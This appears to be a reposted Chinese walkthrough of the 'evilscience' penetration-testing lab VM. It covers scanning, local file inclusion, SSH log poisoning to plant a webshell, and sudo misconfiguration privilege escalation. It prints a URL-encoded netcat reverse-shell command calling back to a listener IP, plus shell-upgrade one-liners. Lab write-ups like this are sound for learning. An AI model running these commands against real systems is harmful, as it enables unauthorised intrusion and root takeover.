kali滲透綜合靶機(十六)--evilscience靶機


kali滲透綜合靶機(十六)--evilscience靶機

一、主機發現

1.netdiscover -i eth0 -r 192.168.10.0/24

  

二、端口掃描

1. masscan --rate=10000 -p0-65535 192.168.10.195

   

三、端口服務識別

1. nmap -sV -T4 -O -p 22,80 192.168.10.195 

  

四、漏洞查找與利用

1.目錄掃描

  

2. 發現http://192.168.10.195/fuck,下載下來沒啥用

3.發現http://192.168.10.195/index.php?file=about.php 測試存在本地文件包含

  

4.包含/etc/passwd,失敗,嘗試用burp進行模糊測試,可以看到可以包含/var/log/auth.log文件,可以利用ssh登錄產生錯誤日志

  

5. 利用ssh登錄產生錯誤日志,可以看到錯誤信息寫入到日志中,可以利用ssh錯誤日志寫入一句話木馬

  

  

6.利用ssh日志寫入一句話木馬

  

7.測試一句話是否成功寫入,下圖可以看到成功執行,然后可以執行任何系統命令

  

8.反彈shell,需要對反彈shell中特殊符號進行url編碼,不要對整個url進行編碼

mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

  

9.kali端開啟監聽,然后用python -c ‘import pty;pty.spawn(“/bin/bash”)’,重新打開一個終端

  

10.上圖看到用python -c 打開的一個終端還是受限的,需要在用awk ‘BEGIN{system(“/bin/bash”)}’重新打開一個終端

提權一:

1.Sudo -l查看是否屬於sudo組

  

2. 可以使用sudo權限不需要密碼執行xxxlogauditorxxx.py,查看一下該文件的權限, 該py文件的配置錯誤,導致可以直接以root權限執行命令,查看腳本存在命令執行漏洞

  

3.msfvenom生成一個payload,上傳到目標,增加執行權限

  

4.sudo運行該腳本,

  

5.kali開啟監聽

  

提權二:

1.首先給/etc/sudoers加寫入權限

  

2.然后把當前用戶以不用密碼的登錄方式添加到sudo組

  

3.sudo -i 獲得root權限

  

 

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM